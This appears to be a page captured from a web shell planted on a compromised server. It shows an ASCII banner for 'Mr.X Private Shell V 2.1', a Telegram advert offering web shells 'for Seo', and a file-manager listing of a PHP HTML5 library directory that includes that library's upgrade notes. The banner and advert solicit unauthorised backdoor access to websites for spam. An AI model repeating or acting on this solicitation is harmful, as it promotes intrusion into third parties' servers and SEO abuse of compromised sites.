__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
From 1.x to 2.x
=================
- All classes uses `Masterminds` namespace.
- All public static methods has been removed from `HTML5` class and the general API to access the HTML5 functionalities has changed.
Before:
$dom = \HTML5::loadHTML('<html>....');
\HTML5::saveHTML($dom);
After:
use Masterminds\HTML5;
$html5 = new HTML5();
$dom = $html5->loadHTML('<html>....');
echo $html5->saveHTML($dom);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| bin | Folder | 0750 |
|
|
| src | Folder | 0750 |
|
|
| CREDITS | File | 687 B | 0640 |
|
| LICENSE.txt | File | 2.9 KB | 0640 |
|
| README.md | File | 9.62 KB | 0640 |
|
| RELEASE.md | File | 4.95 KB | 0640 |
|
| UPGRADING.md | File | 496 B | 0640 |
|
| composer.json | File | 1.01 KB | 0640 |
|